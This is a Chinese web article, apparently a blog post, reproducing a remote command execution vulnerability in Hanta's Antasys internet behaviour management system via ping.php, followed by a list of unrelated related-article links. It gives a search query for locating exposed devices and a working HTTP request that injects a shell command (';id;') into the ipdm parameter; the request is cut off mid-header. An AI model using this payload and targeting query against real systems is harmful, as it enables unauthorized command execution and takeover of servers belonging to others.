当前位置: 首页 > article >正文

汉塔上网行为管理 ping.php 远程命令执行漏洞复现(附脚本)

0x01 产品描述:

        上海汉塔网络科技有限公司多年来一直专注于网络应用的软件开发,在网络安全、网络协议分析、网络数据流控制等领域有着丰富的经验和雄厚的技术实力。同时,公司积累了丰富的数据通信及网络安全产品研发、生产、销售及服务经验,是行业领先的新一代信息安全产品供应商,目前拥有上网行为管理、IPSecVPN、SSLVPN、流量控制等多款产品
0x02 漏洞描述:

        上海汉塔网络科技有限公司上网行为管理系统ping.php存在远程命令执行漏洞,未经授权的攻击者可利用该漏洞远程执行命令以获取服务器权限。
0x03 搜索语句:

body="Antasys"


0x04 漏洞复现:

GET /dgn/dgn_tools/ping.php?ipdm=127.0.0.1;id;&ps=64&cnt=1 HTTP/1.1
Host: your-ip
Priority: u=0, i
User-Agent: Mozilla/5.0 (Maci

http://www.kler.cn/a/449478.html

相关文章:

  • 重塑数字文档处理:TX Text Control的2024年里程碑
  • SQL 实战:窗口函数的妙用 – 分析排名与分组聚合
  • 一体式IO模块:打印机加工产线国产化降本增效的新利器
  • MyBatis 中常用标签
  • VSCode 搭建Python编程环境 2024新版图文安装教程(Python环境搭建+VSCode安装+运行测试+背景图设置)
  • 电脑丢失bcrypt.dll文件是什么原因?找不到bcrypt.dll文件修复办法来啦!
  • 计算机毕设-基于springboot的校园招聘网站的设计与实现(附源码+lw+ppt+开题报告)
  • Python毕业设计选题:基于Python的社区爱心养老管理系统设计与实现_django
  • VScode中配置ESlint+Prettier详细步骤(图文详情)
  • 重温设计模式--建造者模式
  • 基于矩阵乘积态的生成模型:量子力学与生成任务的结合
  • Transformer自注意力机制详解
  • Rust之抽空学习系列(五)—— 所有权(上)
  • 《点点之歌》“意外”诞生记
  • 【学术小白的学习之路】基于情感词典的中文句子情感分析(代码词典获取在结尾)
  • springboot+vue的高校宿舍管理系统
  • iOS - 超好用的隐私清单修复脚本(持续更新)
  • DDoS防护中的流量清洗与智能调度
  • 云原生服务网格Istio实战
  • Spring学习(一)——Sping-XML
  • Sigrity Speed2000 仿真分析教程与实例分析文件路径
  • 【漫话机器学习系列】019.布里(莱)尔分数(Birer score)
  • 前端开发 之 12个鼠标交互特效下【附完整源码】
  • Pinia与Vuex的区别
  • ARM异常处理 M33
  • 单片机:实现自动关机电路(附带源码)